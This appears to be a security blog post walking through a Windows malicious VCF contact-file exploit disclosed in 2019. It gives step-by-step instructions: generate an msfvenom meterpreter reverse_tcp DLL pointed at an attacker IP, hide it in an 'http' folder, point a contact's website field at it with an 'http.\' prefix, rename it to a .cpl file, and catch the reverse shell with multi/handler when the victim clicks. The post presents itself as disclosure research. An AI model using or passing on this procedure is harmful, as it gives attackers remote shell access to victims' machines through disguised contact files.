Malicious Contact VCF file Exploit
A. Gerald Young
Cloud Security/Architecture | Cybersecurity Professional | 5x AWS Certified | CISSP | CRISC | CISA | GCIH | GMOB | MCP
On January 15th 2019 a vulnerability was revealed which allows a Windows PC to be exploited using a malicious contact VCF file. This was a 0-day exploit and of course works with Windows 10 also. It has been categorized under “Insufficient UI warning remote code execution” vulnerability.
Introduction:
What has been discovered it if we replaced the website in a VCF file with the local path of a CPL file, it tends to install that file instead of opening it on browser. This is done by replacing the “https://” with “http.\\”. A regular user would need the eyes of multi mega pixels to discover an intentional path error. Once the change is made all we need to do is to send a victim the malicious VCF file along with our CPL file in a folder named “http” (it has to be http only for local path inclusion) and we exploit the PC and gain remote access through a shell.
To read more about the research follow the link here.
Methodology:
- Making an MSF venom windows payload with .dll extension
- Sending the dll file in a folder named “http”
- Creating a contact file in the parent folder of “http”
- Adding a website into the contact
- Changing the prefix of website from https:// to http.\\
- Renaming the dll file to “<name of website>.cpl”
- Running multi handler in a window
- Opening the website path from the contact
- Spawning shell
Proof of Concept:
The first step would be to make a payload with a dll extension. For this purpose, we are using msfvenom’s windows payload but any other payload should work just fine.
In this case my local IP address is 192.168.1.109.
MSF venom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234-f dll >shell.dll
Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else since we are including a path later on in the website link. And it has to be in the current directory too. So, we copy this shell.dll file into the victim machine.
Next and the most important step is to make a contact VCF file. You can download a sample VCF and add a website, but we made a new contact file. The system we are using is Windows 10 so the version of VCF file may differ from yours but it would work just the same.
Add any name in the contact file. I added Magic Johnson.
Click the next tab titled "Home" and you’ll see a text box to input a website. Add any website’s name as you desire. I added the following website name “exploityourmachine.tech” but here is the most important thing you have to note here:
A generic website’s link is https://www.exploityourmachine.tech but we modify the prefix just a little by replacing the https://with http.\\ making the link read http:\\www.exploityourmachine.tech
This is because we don’t actually want to include a website but we want to include a path to our DLL file so that when the victim clicks on the website, our DLL should run.
Here, we are suffixing the website link with “.cpl” extension. A CPL file is a control panel item, such as Displays, Mouse, Sound, or Networking, used by the Windows operating system.
Save the contact. Now rename our payload from shell.dll to www.exploityourmachine.tech.cpl
Now we are prepped and ready to run the DLL file so we set up multi/handler on a terminal window and opened the contact on victim’s machine.
As soon as the victim clicks on the link in the VCF file, we will see a session is obtained on our Kali Linux terminal!
This spawns a shell of the current user of windows that is logged on.
Conclusion:
This vulnerability works on all versions of Windows that support contact VCF files, which includes Windows 10. As you can see we have spawned a Windows 10 shell. This 0-day exploit has yet to be patched by Microsoft. You can read more about this exploit here.